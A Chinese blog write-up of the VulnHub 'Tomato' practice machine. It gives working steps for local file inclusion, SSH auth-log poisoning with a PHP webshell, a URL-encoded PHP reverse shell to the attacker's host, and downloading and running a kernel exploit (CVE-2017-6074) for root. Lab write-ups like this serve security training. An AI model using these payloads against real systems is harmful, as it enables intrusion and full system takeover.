vlunhub之tomato

最新推荐文章于 2024-05-12 12:36:27 发布
最新推荐文章于 2024-05-12 12:36:27 发布
阅读量361 收藏 2
点赞数
分类专栏: vulnhub靶场 文章标签: 渗透测试 安全漏洞 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50688050/article/details/117411168
版权

目录

信息搜集

扫描网段确定主机IP地址

​扫描该IP地址开放端口以及服务

​发现漏洞

利用IP地址登录

​尝试扫描出的端口

爆破网站目录

发现敏感文件泄露

利用漏洞

尝试getsell

利用php反弹shell

权限提升

在该目录下开启http服务

在getshell里下载该文件

信息搜集

扫描网段确定主机IP地址

扫描该IP地址开放端口以及服务

nmap -A -p- 192.168.179.128

发现漏洞

利用IP地址登录

尝试扫描出的端口

只有8888端口有一个登录界面简单尝试了一些并没有登录成功,而在尝试80端口的时候会跳转回主页面,推测80端口是http服务的端口

爆破网站目录

dirb http://192.168.179.128

发现敏感文件泄露

http://192.168.179.128/antibot_image/

挨个点进去看一下,发现phpinfo()

右击查看源代码,发现文件包含代码

尝试文件包含

http://192.168.179.128/antibot_image/antibots/info.php?image=../../../../../../../etc/passwd

成功执行说明这个点确实存在文件包含漏洞

但是观察这个点,只能包含本地文件远程的就别想了

利用漏洞

所以我们需要换个思路,前面扫描的时候我们看到还有一个2211端口是开启了ssh服务的。我们尝试登录ssh的时候登录信息是回被记录到/var/log/auth.log,我们可以尝试将一句话木马写入该日志,然后利用文件包含该日志文件

ssh '<?php system($_GET['shell']); ?>'@192.168.179.128 -p2211

验证一下是否被写入到日志文件中

http://192.168.179.128/antibot_image/antibots/info.php?image=../../../../../../../../../var/log/auth.log&shell=ls

查看页面源代码

么得问题已经顺利写入了

尝试getsell

利用php反弹shell

首先在kali上监听1234

nc -lvnp 1234

php反弹代码

php -r '$sock=fsockopen("192.168.179.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

需要进行url编码且将空格替换为+,再拼接起来利用文件包含

http://192.168.179.128/antibot_image/antibots/info.php?image=../../../../../../../../../var/log/auth.log&shell=php+-r+%27%24sock%3dfsockopen(%22192.168.179.145%22%2c1234)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27

成功getshell

权限提升

利用python建立一个可交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

查看内核版本

uname -a

上GitHub上搜索并下载相应的exp

git clone https://github.com/kkamagui/linux-kernel-exploits.git

我们选择这个

运行complie.sh 编译.c文件

compile.sh  CVE-2017-6074.c

在该目录下开启http服务

 python -m SimpleHTTPServer 8080

在getshell里下载该文件

需要先进/tmp目录下

wget http://192.168.179.145:8080/CVE-2017-6074

查看文件权限

可以看到下载的文件是没有执行权限的

赋予权限

chmod +x CVE-2017-6074

运行该文件

./CVE-2017-6074

拿到root权限

鲨鱼辣椒k
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub篇Tomato
千寻的博客
01-12 647
环境搭建 下载地址: https://www.vulnhub.com/entry/tomato-1,557/ kali 192.168.232.140 tomato: 192.168.232.175 win10 :192.168.232.171 第一部分 信息收集 第一步 扫描,发现主机 nmap -sP 192.168.232.0/24 arp-scan -l 第二步 扫描开放的端口 nmap -A -p- 192.168.232.175 nmap -sS -sV -p- -v 192.168.
tomato 无线打印服务器,转一篇关于Tomato无线设置的文章
weixin_36087577的博客
08-10 1136
本帖最后由 jackberry 于 2017-5-8 20:50 编辑Tomato 1.28.0542 无线网络相关设定张贴者: 蛋泥 于 下午8:35 2014年3月22日 星期六文章来源Tomato 1.28.0542 无线网络相关设定升版到1.28.0542后的这几天为了无线网络的设定,真的伤透了脑筋,因为家中的无线设备实在太多,为了要兼容所有的设备,设定真的是改了又改...所以决定写这篇,...
vulnhub之tomato(西红柿)
weixin_54431413的博客
06-30 735
文件包含漏洞,可以读取目标主机敏感文件,可以读取私钥文件,读取日志文件,如果开启开关的话,可以读取远程文件。 我们利用/var/log/auth.log写入失败信息,结合文件包含来执行反弹shell。后利用linux-exploit内核检测工具,挨个尝试,然后提权。 ...
2024年最新靶机实战系列之Tomato靶机,2024年最新神级Golang进阶笔记
最新发布
2401_84919661的博客
05-12 258
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。(都打包成一块的了,不能一一展开,总共300多集)同样的在日志文件中确实发现了存在相关记录。1.6 反弹shell。
tomato 无线打印服务器,Tomato 安装KMS服务器
weixin_31473773的博客
08-10 586
附表:微软公布的GVLK①Windows GVLK密钥:Office Professional Plus 2016XQNVK-8JYDB-WJ9W3-YJ8YR-WFG99Office Standard 2016JNRGM-WHDWX-FJJG3-K47QV-DRTFMProject Professional 2016YG9NW-3K39V-2T3HJ-93F3Q-G83KTProject Sta...
tomato php mysql_Tomato手动零开始搭建nginx+php+mysql服务器教程(需要外置磁盘)
weixin_31813357的博客
01-19 344
1、格式化U盘成EX3格式。umount /dev/sda1umount /optmkfs.ext3 /dev/sda12、挂载opt分区(tmp/mnt/sda1是我的硬盘路径)在U盘上新建一个opt文件夹: mkdir tmp/mnt/sda1/opt挂载U盘到opt目录: mount -o bind /tmp/mnt/sda1/opt /opt3、安装optwarecd /optwgetht...
tomato靶场复现
m0_68471358的博客
08-03 393
在多次尝试后,发现/var/log/auth.log中记录了FTP和SSH的登录服务,我们使用root和root123123123123123账户尝试ssh登录,可以看到被写入到了auth.log日志文件中,如果我们换成一句话木马内容,并且写入到此日志文件中,就可以使用系统目前的文件包含漏洞加载此日志文件,加载一句话木马。include语句会获取指定文件中存在的所有文本/代码/标记,文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。
VS Tomato插件常用快捷键
热门推荐
艾孜尔江的博客
04-27 1万+
CTRL + G 显示当前光标所在行的行号,且输入某一行可直接定位到该行 ALT + M 显示当前打开文档的所有方法(且可输入进行过滤) SHIFT + ALT + O (查找文件)直接定位,按字母排序,可进行筛选 SHIFT + ALT + S 查找某个方法,按字母排序,可进行筛选 SHIFT + ALT + R 选定内容重命名 ...
vulnhub靶场-tomato
qq_42947816的博客
03-07 7524
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
靶机实战系列之Tomato靶机,2024年最新oppo鸿蒙面试
2401_84159966的博客
04-18 917
linux-exploit-suggester可以用来枚举内核漏洞。发现漏洞号为45010搜索此漏洞,gcc编译,传到靶机。远程文件包含功能通过info.php发现已经关闭。发现存在ubuntu系统默认写入身份认证文件路径。尝试登录 ssh操作后会写入身份认证日志文件。同样的在日志文件中确实发现了存在相关记录。本地文件包含发现账号tomcat。image参数 存在 文件包含。1.4 源码分析+文件包含。1.6 反弹shell。1.7 内核漏洞枚举。
Tomato RAF+ 固件合集
07-06
Tomato RAF+ 可以让普通路由器摇身一变,成为拥有不逊色于商用路由器的功能的路由器, Tomato RAF+ 绝对是你遇到的国内功能最强的Tomato 固件,它是一款适合家用和商用的免费第三方路由器系统。 刷了 Tomato RAF+ 的...
tomato固件修改工具
06-01
"Tomato固件修改工具"是一款专为网络路由器固件定制和优化的工具,尤其适用于那些使用Tomato固件的设备。Tomato是一款轻量级的开源固件,基于Linux,提供了一系列高级功能,如DDNS(动态域名解析服务)、QoS(服务...
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
tomato固件
01-01
tomato-K26-1.28.20141211MIPSR2-Arctic-MultiWAN-Micro-NoUSB 亲测可用
tomato打印服务共享教程
06-01
例如,如果主路由器的IP地址为192.168.1.1,则需要将之修改为192.168.1.254。然后,取消DHCP,点击确定,最后将主路由器的网线连接到服务器的Lan口。需要注意的是,如果修改错误,可能会导致无法访问配置页面,可以...
vulnhub--lampiao(脏牛提权)
鲨鱼辣椒的博客
08-03 4467
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
vlunhub之potato
鲨鱼辣椒的博客
05-31 2617
目录 信息搜集 扫描网段 扫描端口 扫描网站目录 发现漏洞 尝试爆破 登录 提权 查看内核版本找到合适的poc 信息搜集 扫描网段 nmap -sP 192.168.179.0/24 扫描端口 nmap -sS -sV -p- -v 192.168.179.129 扫描网站目录 dirb http://192.168.179.129/ 发现漏洞 挨个进这几个页面去看一看,只知道一个phpinfo界面,找到一个算是敏感信息泄露的漏洞,其他的就没有什么.
vlunhub之Nagini(详细过程)
鲨鱼辣椒的博客
06-02 2054
horcrux_{MzogU2x5dGhFcmlOJ3MgTG9jS0VldCBkRXN0cm9ZZUQgYlkgUm9O}
Tomato DualWAN 路由器用户手册:双 WAN 口解决方案
Tomato DualWAN 用户手册 Tomato DualWAN 是一个基于 Tomato 或 DD-WRT 固件的路由器固件,可以将支持 Tomato 或 DD-WRT 固件的路由器由原来的单 WAN 口变成双 WAN 口,而不需要在路由器上增加任何硬件。该固件可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值